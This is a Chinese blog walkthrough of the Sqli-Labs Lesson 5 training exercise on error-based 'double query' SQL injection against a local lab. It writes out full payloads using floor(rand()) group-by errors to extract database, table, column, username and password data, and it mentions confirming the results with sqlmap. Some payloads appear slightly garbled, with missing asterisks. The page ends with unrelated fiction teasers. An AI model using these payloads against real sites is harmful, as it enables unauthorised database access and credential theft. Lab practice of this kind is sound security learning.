Sqli-Labs_Lesson_5 GET - Double Injection - Single Quotes - String

Sqli-Labs 是一个印度人的开源项目平台。里面包含了基本的各种注入类型,同时又有get和post类型,以及一些基本的绕过学习。

项目地址:https://github.com/Audi-1/sqli-labs

SQL注入

Lesson-5 #GET - Double Injection - Single Quotes - String (双注入GET单引号字符型注入)
运行测试环境:http://localhost/sqli-labs-master/Less-5/
输入ID参数1:http://localhost/sqli-labs-master/Less-4/?id=1 ,返回正常:
?id=1
在参数中尝试插入单引号,网站报错:
单引号网站报错
测试and 1=1 ,并注释后面的SQL语句,网站返回正常:
and 1=1 --+
测试and 1=2 ,并注释后面的SQL语句,网站返回不正常:
and 1=2 --+
说明存在注入,继续测试:
order by =3
order by 3返回正常,order by 4返回错误,说明所在表中有三列。
前4Lesson都是通过闭合SQL语句从而注入,但是现在闭合正确只会显示“You are in.......”,尝试数据库报错来取得想要的数据==:
基于错误的SQL语句的关键函数(构造能够导致逻辑错误的SQL语句):

-count():用于统计元组的数量
-rand():用于产生一个0~1的随机数字
-floor():向下取整
-group by:根据要求对结果排序
-EXTRACTVALUE (XML_document, XPath_string):从目标XML中返回包含所查询值的字符串
  XML_document:是String格式,为XML文档对象的名称
  XPath_string :Xpath格式的字符串
-UPDATEXML (XML_document, XPath_string, new_value):改变文档中符合条件的节点的值
  XML_document:是String格式,为XML文档对象的名称
  XPath_string :Xpath格式的字符串
  new_value:String格式,替换查找到的符合条件的数据

通过order by 来查询:
order by
继续用union select 来查询:
没有查到有用的信息,我们再尝试用网站报错的形式查询当前所在数据库:

http://localhost/sqli-labs-master/Less-5/

?id=1' and (select 1 from ( select count(),concat(0x3a,0x3a,database(),0x3a,0x3a,floor(rand()2))name from information_schema.tables group by name)a)--+

报错查询当前数据库
查询当前数据库版本:
报错查询当前数据库版本
information_schema.tables里面查看当前数据库里面的的第一个表:

http://localhost/sqli-labs-master/Less-5/
?id=1' and (select 1 from ( select count(),concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x3a,0x3a,floor(rand()2))name from information_schema.tables group by name)a)--+

查看当前数据库里面的的第一个表
发现当前数据库中有users表,查看表里面有哪些列:

http://localhost/sqli-labs-master/Less-5/
?id=1' and (select 1 from ( select count(),concat(0x3a,0x3a,(select column_name from information_schema.columns where table_name='users' limit 3,1),0x3a,0x3a,floor(rand()2))name from information_schema.tables group by name)a)--+

当前数据库中user表
user表第一列
查询user表中的字段username:

http://localhost/sqli-labs-master/Less-5/?id=1'
and (select 1 from ( select count(),concat(0x3a,0x3a,(select username from users limit 1,1),0x3a,0x3a,floor(rand()2))name from information_schema.tables group by name)a)--+

查询user表中的字段username
查询user表中的字段password:
查询user表中的字段password

参考链接:https://bugs.mysql.com/bug.php?id=32249


利用注入神器sqlmap验证一下:

SQLMAP结果

SQL Injection:就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。

具体来说,它是利用现有应用程序,将(恶意)的SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 201,468评论 5 473
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 84,620评论 2 377
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 148,427评论 0 334
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 54,160评论 1 272
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 63,197评论 5 363
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 48,334评论 1 281
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 37,775评论 3 393
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 36,444评论 0 256
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 40,628评论 1 295
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 35,459评论 2 317
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 37,508评论 1 329
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 33,210评论 3 318
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 38,767评论 3 303
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 29,850评论 0 19
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 31,076评论 1 258
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 42,627评论 2 348
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 42,196评论 2 341

推荐阅读更多精彩内容